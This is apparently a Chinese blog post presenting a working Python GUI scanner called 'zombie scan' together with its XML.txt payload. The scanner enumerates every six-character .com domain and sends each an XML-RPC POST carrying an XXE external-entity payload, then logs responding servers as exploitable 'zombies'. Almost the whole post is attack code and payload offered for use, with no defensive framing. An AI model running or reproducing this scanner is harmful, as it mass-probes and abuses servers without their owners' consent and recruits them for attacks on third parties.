在上篇文章讲了原理功能滥用漏洞研究-CSDN博客
现在讲如何发现功能滥用漏洞的服务器:
import os
import array as arr
import threading
from threading import Thread
import socket
import time
import tkinter as tk
def abc():
var.set(str1[w6] + str1[w5] + str1[w4] + str1[w3] + str1[w2] + str1[w1] + '.com \n 已找到僵尸' + str(
jian) + '个 \n 正在工作的线程' + str(threading.active_count()) + '\n')
with open('name.txt', 'w') as file:
file.write(str(w6) + '\n' + str(w5) + '\n' + str(w4) + '\n' + str(w3) + '\n' + str(w2) + '\n' + str(w1) + '\n')
result.after(1000, abc)
def callback():
global jian
t1=list(range(0, 100000))
content111 = int(entry.get())
for i in range(0, int(content111)):
t1[i] = Thread(target=run)
t1[i].start()
abc()
with open("name.txt", 'r', ) as file:
content21 = file.read()
result12 = content21.split("\n")
w1=int(result12[5])
w2=int(result12[4])
w3=int(result12[3])
w4=int(result12[2])
w5=int(result12[1])
w6=int(result12[0])
str1=arr.array('u', ['a', 'b', 'c', 'd', 'e','g','h','f','i','j','k','l','m', 'n', 'o', 'p', 'q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0'])
jian=0
def run():
while True:
lock = threading.Lock()
lock.acquire()
global w1,w2,w3,w4,w5,w6,str1,jian
w1 = w1 + 1
if w1>35:
w2 = w2 + 1
w1=0
if w2>35:
w3=w3 + 1
w2=0
if w3>35:
w4=w4 + 1
w3=0
if w4>35:
w5=w5 + 1
w4=0
if w5>35:
w6=w6 + 1
w5=0
k1=w1
k2=w2
k3=w3
k4=w4
k5=w5
k6=w6
lock.release()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
work=str1[k6]+str1[k5]+str1[k4]+str1[k3]+str1[k2]+str1[k1]+'.com'
url = "http://"+work+"/"
server_address = (work, 80)
work = work.encode()
try:
client_socket.connect(server_address)
client_socket.sendall(b'POST / HTTP/1.1\n')
client_socket.sendall(b'Host: '+work+ b' \n')
client_socket.sendall(b'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n')
client_socket.sendall(b'Accept: */*\n')
with open('XML.txt', 'r') as file:
content = file.read()
body = len(content)
if (type(body) is int):
body = '{}'.format(body)
body = body.encode()
client_socket.sendall(b'Content-Length: ' + body + b'\n')
client_socket.sendall(b'Content-Type: application/x-www-form-urlencoded\n')
client_socket.sendall(b"Connection: close\n\n")
content = content.encode()
client_socket.sendall(content + b"\r\n\r\n")
data = client_socket.recv(1024)
as2 = data.decode().split("HTTP/1.1")
as3 = as2[1].strip()
data = as3[0:3]
data = int(data)
if data < 400:
jian=jian+1
data = str(data)
lock = threading.Lock()
lock.acquire()
with open('xkj.txt', "a") as file:
file.write(url+';XML;XML.txt\n')
file.close()
lock.release()
else:
data = str(data)
client_socket.close()
except Exception as e:
result4 = str(e).split("\n")
continue
clear_screen_sequence = '\033[2J'
move_cursor_sequence = '\033[H'
root = tk.Tk()
root.title('僵尸扫描')
tips = tk.Label(root, text='请输入进程数')
tips.grid(row=0)
# 输入框
entry = tk.Entry(root)
entry.grid(row=0, column=1, padx=10, pady=5)
# 确定按钮
confirm = tk.Button(root, text='确定', command=callback)
confirm.grid(row=1, column=1, padx=10, pady=5)
var = tk.StringVar()
var.set('请输入数字!')
result = tk.Label(root, textvariable=var)
result.grid(row=2, column=0, padx=10, pady=5)
quit = tk.Button(root, text='退出', command=root.quit)
quit.grid(row=2, column=1, padx=10, pady=5)
root.mainloop()
其他文件
XML.txt
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY>
<!ENTITY xxe SYSTEM "http://site" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
name.txt
0
0
0
0
0
0
原理
依次扫描aaaaaa.com到zzzzzz.com的网站是否存在漏洞